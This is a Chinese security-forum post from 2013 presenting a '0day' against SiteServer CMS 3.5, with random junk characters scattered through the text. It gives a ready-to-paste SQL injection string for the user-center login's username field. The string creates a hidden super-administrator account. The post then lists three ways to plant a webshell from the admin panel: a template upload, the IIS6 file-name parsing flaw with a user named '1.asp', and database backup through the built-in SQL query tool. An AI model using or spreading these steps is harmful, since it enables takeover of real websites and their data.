找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2161|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版! L* F# |+ u& l8 \0 H

5 a1 e- O) C2 Q( Xstieserver官网:www.siteserver.cn
9 s/ k8 Z( y* ?  V# @1 k6 ]( \& \- S% Z. J; |. R* p

2 ]  e4 o  Y; M& r2 ]5 c- ?: ^! @9 C# G! y& [
EXP:, ~; S( u5 E1 W  i" M

; X% Y5 b( I5 Y- U  E% r直接访问UserCenter/login.aspx
; y* K, q4 W" F0 i* M' b5 L* H% `+ p7 N& \4 o, J. k9 L7 K
5 y& A# w0 [; I/ o: k5 L
$ V! N! }- s0 k& U& |7 {+ `
用户名处输入:
; ?! Z6 X# _/ S# A: B$ ^! v! J  N
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
4 m# t+ g" z  i
( r% o* \( @! C% v* D- i) |3 e' B
9 @, D" v$ M- B! \9 G; U
1 t" H7 [2 @) }7 T1 ~+ w' Z5 G密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
5 \; a8 W4 N; N/ r: _; o7 k4 R# `5 b0 ^# U  [2 J9 V' H
& }4 j8 j9 `  K3 |; X$ ?
3 o  g* A! W% O& L2 ~
之后再访问后台SiteServer/login.aspx用插入的用户登陆
$ ~: ?2 s. n1 n: R6 {& F  W# G7 A9 y1 ]0 G/ s8 C6 D4 |; x

1 x$ K; i! M2 x" f- }; M) C* Q. T, y# s' p  e( u
后台拿webshell的三种方法:
( \3 s7 ]1 T) \9 z! W
' h4 p# p% D* ?) a4 \& B. `一、
) _$ y) C/ l* P. B' i! C9 N2 o2 ~+ A* M
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx5 c( z. \/ O  n. P# o

- i( K1 m- s1 g6 i二、
5 `9 R& ]9 r3 p3 n
0 L& \# @, x7 I# i成员权限-》添加用户-》用户名为:1.asp
2 \8 @" l1 Z2 s! G
) |' o7 O2 \2 P) i. @' s  @  Fhttp://127.0.0.1/usercenter/# m! k4 x7 m9 p; O4 I7 o! q
( V9 k( U  p  j5 x! i7 Z0 Y/ ?
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell$ D' W% T( t- g
% N: A& b; H2 A3 V
(ps:后台添加用户时不会验证是否含有非法字符)2 d+ a5 M- S: S$ U8 `' C
/ t" h8 _( v) Z6 d- I" G
三、
1 H3 j) M, i1 y2 m4 Z6 U" f
) e' X. }, {( w2 ?- J# }' y; A系统工具-》实用工具-》机器参数查看
! s. S5 l! l# n, c% n可以看到数据库类型、名称,WEB路径( |* M# h; {: T% h
% O% a' H9 @1 }0 r- z
系统工具-》数据库工具-》SQL语句查询+ S1 |! l7 K7 d  c- j) o* u% V
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
: J" W0 i8 S' ~/ P+ _4 Q
8 g) F- J9 ]; d+ i1 @8 `; V/ n% m& Y$ H
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表